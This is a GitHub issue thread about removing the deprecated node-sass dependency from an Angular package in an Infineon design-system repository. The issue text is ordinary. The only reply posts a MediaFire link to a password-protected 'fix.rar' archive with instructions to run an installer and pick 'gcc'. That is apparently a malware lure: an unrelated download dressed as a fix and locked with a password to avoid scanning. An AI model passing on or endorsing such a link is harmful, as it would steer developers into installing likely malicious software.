### ISSUE TITLE
Angular package: remove deprecated dependencies

### ISSUE THREAD

**Issue by tishoyanchev** [Infineon/infineon-design-system-stencil#1434]
when running npm install on the Angular package, users are getting warning messages:
npm WARN deprecated node-sass@9.0.0: Node Sass is no longer supported. Please use `sass` or `sass-embedded` instead.
angular

related to the deprecation of node-sass. 
Investigate if replacing node-sass with sass is a problem, and if not, replace it.

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
